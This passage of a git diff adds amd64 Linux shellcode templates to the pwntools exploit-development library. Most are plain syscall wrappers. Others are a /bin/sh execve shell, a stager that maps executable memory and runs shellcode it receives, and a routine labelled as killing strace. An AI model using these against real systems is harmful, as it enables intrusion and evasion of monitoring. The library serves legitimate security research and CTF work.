100644 index 000000000..126a2273d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/renameat.asm b/pwnlib/shellcraft/templates/amd64/linux/renameat.asm new file mode 100644 index 000000000..19f57b43a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm b/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm new file mode 100644 index 000000000..4fa3fb555 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..27b2a736e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..a93ca75f0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm new file mode 100644 index 000000000..0c240351f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm new file mode 100644 index 000000000..ccd349996 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm new file mode 100644 index 000000000..5a1aad669 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..707bb8da6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm new file mode 100644 index 000000000..58dc40019 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm new file mode 100644 index 000000000..51304f254 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm new file mode 100644 index 000000000..8fadcc929 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm b/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm new file mode 100644 index 000000000..3518171f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/select.asm b/pwnlib/shellcraft/templates/amd64/linux/select.asm new file mode 100644 index 000000000..9eb7f5b27 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm b/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm new file mode 100644 index 000000000..df39dbb94 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm b/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm new file mode 100644 index 000000000..00978f96d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm b/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm new file mode 100644 index 000000000..57305f3ff --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setgid.asm b/pwnlib/shellcraft/templates/amd64/linux/setgid.asm new file mode 100644 index 000000000..ee7396962 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm b/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm new file mode 100644 index 000000000..1c3b745a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm b/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm new file mode 100644 index 000000000..8a618783f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm b/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm new file mode 100644 index 000000000..bcd844e00 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm b/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm new file mode 100644 index 000000000..4f46cf653 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm b/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm new file mode 100644 index 000000000..02bd28501 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm b/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm new file mode 100644 index 000000000..268d8c292 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm b/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm new file mode 100644 index 000000000..72beec5c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm b/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm new file mode 100644 index 000000000..e82f0d23a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsid.asm b/pwnlib/shellcraft/templates/amd64/linux/setsid.asm new file mode 100644 index 000000000..b527e2a2d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm b/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm new file mode 100644 index 000000000..3deb3d236 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall + from pwnlib.shellcraft.amd64 import push +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..7a6aea9b1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.amd64.linux import setsockopt + from pwnlib.shellcraft.amd64 import push + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt to set a timeout on a socket in seconds. +See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + ${push(0)} + ${push(secs)} + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'rsp', 16)} + diff --git a/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm b/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm new file mode 100644 index 000000000..4673c85ef --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/setuid.asm b/pwnlib/shellcraft/templates/amd64/linux/setuid.asm new file mode 100644 index 000000000..94fdf7c0d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sh.asm b/pwnlib/shellcraft/templates/amd64/linux/sh.asm index f962fe526..ad302c2c2 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/sh.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/sh.asm @@ -1,6 +1,11 @@ <% from pwnlib.shellcraft import amd64 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute a different process. -${amd64.pushstr("/bin///sh")} + >>> p = run_assembly(shellcraft.amd64.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' -${amd64.syscall('SYS_execve', 'rsp', 0, 0)} + +${amd64.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm b/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm new file mode 100644 index 000000000..aa3d52ebb --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm new file mode 100644 index 000000000..5a9eabd44 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/signal.asm b/pwnlib/shellcraft/templates/amd64/linux/signal.asm new file mode 100644 index 000000000..a267c7adf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm b/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm new file mode 100644 index 000000000..8af7e9b15 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm new file mode 100644 index 000000000..929763a3d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigprocmask.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="how, set, oset, sigsetsize"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + sigsetsize(size_t): sigsetsize + + + ${syscall('SYS_rt_sigprocmask', how, set, oset, sigsetsize)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm b/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm index 2b9b7961f..d250f5299 100644 --- a/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/amd64/linux/sigreturn.asm @@ -1,10 +1,8 @@ - <% from pwnlib.shellcraft.amd64.linux import syscall %> <%docstring> Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. - - ${syscall('SYS_rt_sigreturn', )} + ${syscall('SYS_rt_sigreturn')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm new file mode 100644 index 000000000..570d51066 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/socket.asm b/pwnlib/shellcraft/templates/amd64/linux/socket.asm new file mode 100644 index 000000000..bb6b3f473 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/socket.asm @@ -0,0 +1,16 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.util.net import sockaddr %> +<% from pwnlib.constants import SOCK_STREAM, SOCK_DGRAM, SYS_socket %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network) + socktype = { + 'tcp': SOCK_STREAM, + 'udp': SOCK_DGRAM + }.get(proto, proto) +%>\ + /* open new socket */ + ${amd64.linux.syscall(SYS_socket, address_family, socktype, 0)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/splice.asm b/pwnlib/shellcraft/templates/amd64/linux/splice.asm new file mode 100644 index 000000000..633daac25 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stage.asm b/pwnlib/shellcraft/templates/amd64/linux/stage.asm new file mode 100644 index 000000000..9e54e8c4c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stage.asm @@ -0,0 +1,58 @@ +<% +from pwnlib.shellcraft.amd64 import push +from pwnlib.shellcraft.amd64.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'rsp', 8)} + pop rax + push rax /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align, assume <4GB */ + shr eax, 12 + inc eax + shl eax, 12 + + /* Map it */ + ${mmap(0, 'rax', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop rbx + push rax + + /* Read in all of the data */ + ${readn(fd, 'rax', 'rbx')} + + /* Go to shellcode */ + ret diff --git a/pwnlib/shellcraft/templates/amd64/linux/stat.asm b/pwnlib/shellcraft/templates/amd64/linux/stat.asm new file mode 100644 index 000000000..d0b988fe9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stat64.asm b/pwnlib/shellcraft/templates/amd64/linux/stat64.asm new file mode 100644 index 000000000..70226c90a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/stime.asm b/pwnlib/shellcraft/templates/amd64/linux/stime.asm new file mode 100644 index 000000000..df451b92a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm b/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm new file mode 100644 index 000000000..151916b76 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/strace_dos.asm @@ -0,0 +1,40 @@ +<% +from pwnlib.constants import SYS_select +from pwnlib.shellcraft.amd64.linux import syscall, write +from pwnlib.shellcraft.amd64 import push, mov, pushstr +from pwnlib.shellcraft import common +from random import randint +%> +<%docstring> +Kills strace + +<% +large_value = randint(0x10000000, 0xffffffff) +dos_loop1 = common.label('dos_loop1') +dos_loop2 = common.label('dos_loop2') +count = 0x4000 +big_val = randint(0x10000000, 0x7fffffff) +%> + push rbp + mov rbp, rsp + +## Allocate a lot of stack space + ${mov('rcx', count)} +${dos_loop1}: + push -1 + sub rcx, 1 + test rcx, rcx + jnz ${dos_loop1} + + mov byte ptr [rsp], 0xf8 + ${syscall(SYS_select, big_val, 'rsp', 0, 0)} + + ${mov('rcx', count)} +${dos_loop2}: + pop rax + sub rcx, 1 + test rcx, rcx + jnz ${dos_loop2} + + mov rsp, rbp + pop rbp diff --git a/pwnlib/shellcraft/templates/amd64/linux/stty.asm b/pwnlib/shellcraft/templates/amd64/linux/stty.asm new file mode 100644 index 000000000..de71044d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/symlink.asm b/pwnlib/shellcraft/templates/amd64/linux/symlink.asm new file mode 100644 index 000000000..dd752cb7f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm new file mode 100644 index 000000000..b9f004443 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> 